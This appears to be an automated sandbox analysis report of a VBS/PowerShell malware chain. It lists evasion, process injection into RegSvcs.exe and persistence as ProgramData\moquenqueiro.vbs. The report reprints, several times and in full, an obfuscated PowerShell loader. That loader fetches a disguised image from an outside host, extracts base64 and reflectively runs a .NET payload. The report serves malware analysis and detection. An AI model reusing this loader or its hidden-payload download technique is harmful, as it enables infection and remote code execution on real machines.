Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6072	Thread sleep count: 4640 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6776	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_00007FFB11171FCA GetSystemInfo,

5_2_00007FFB11171FCA

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: wscript.exe, 00000011.00000003.1992549347.0000021195DF1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.1992660377.00000211957F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.1946556922.00000211959F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.1992768983.0000021195BF1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000003.2030200450.00000238111D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000003.2071964316.00000238113D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000003.2071860335.0000023810FD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000003.2071775798.00000238115D1000.00000004.00000020.00020000.00000000.sdmp, moquenqueiro.vbs.12.dr	Binary or memory string: cmd = "cmd /c wevtutil epl ""Microsoft-Windows-Hyper-V-VMMS-Networking"" " & vmmslogFileName
Source: wscript.exe, 00000012.00000003.2030929905.000002381111C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000003.2031675444.0000023811123000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: iJat(r`cmd /c wevtutil epl System /q:"*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]" esults>"
Source: moquenqueiro.vbs.12.dr	Binary or memory string: "$output += ""(Get-VMNetworkAdapter -all)""; " & _
Source: wscript.exe, 00000000.00000003.1519793569.0000020BD976F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1534311589.0000020BD976F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1527581332.0000020BD976F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWZ
Source: wscript.exe, 00000012.00000003.2031675444.0000023811123000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Get*$output += "(Get-VMNetworkAdapter -all)"; R_Mess
Source: wscript.exe, 00000011.00000003.1992549347.0000021195DF1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.1992660377.00000211957F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.1946556922.00000211959F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.1992768983.0000021195BF1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000003.2030200450.00000238111D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000003.2071964316.00000238113D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000003.2071860335.0000023810FD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000003.2071775798.00000238115D1000.00000004.00000020.00020000.00000000.sdmp, moquenqueiro.vbs.12.dr	Binary or memory string: cmd = "cmd /c wevtutil epl System /q:""*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]"" " & vmswitchlogFileName
Source: wscript.exe, 00000000.00000003.1532146325.0000020BD7685000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1530256989.0000020BD767C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1519793569.0000020BD976F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1534311589.0000020BD976F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1530626416.0000020BD7684000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1533686400.0000020BD7685000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1527581332.0000020BD976F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2602959367.000001C93C42B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605045624.000001C941A56000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000012.00000003.2030929905.000002381111C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000003.2031675444.0000023811123000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @cmd /c wevtutil epl "Microsoft-Windows-Hyper-V-VMMS-Networking" > 0, GetReHy
Source: wscript.exe, 00000011.00000003.1947166938.0000021195943000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.1946786425.000002119593D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @cmd /c wevtutil epl "Microsoft-Windows-Hyper-V-VMMS-Networking" rt></Analy
Source: wscript.exe, 00000011.00000003.1946786425.000002119593D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ntEl*$output += "(Get-VMNetworkAdapter -all)"; GetEpn
Source: RegSvcs.exe, 00000010.00000002.2603629041.0000000001397000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: wscript.exe, 00000011.00000003.1947166938.0000021195943000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.1946786425.000002119593D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: iJOpti`cmd /c wevtutil epl System /q:"*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]" act

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_8024.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4652, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 40C000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 40E000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1021008	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'moquenqueiro','RegSvcs',''))} }"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\moquenqueiro.vbs"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremwdgtrevdgtredcdgtreoqdgtre3dgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtreodgtredgtre4dgtredidgtremdgtredgtreydgtredkdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links \| get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'c:\programdata\' , 'moquenqueiro','regsvcs',''))} }"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyq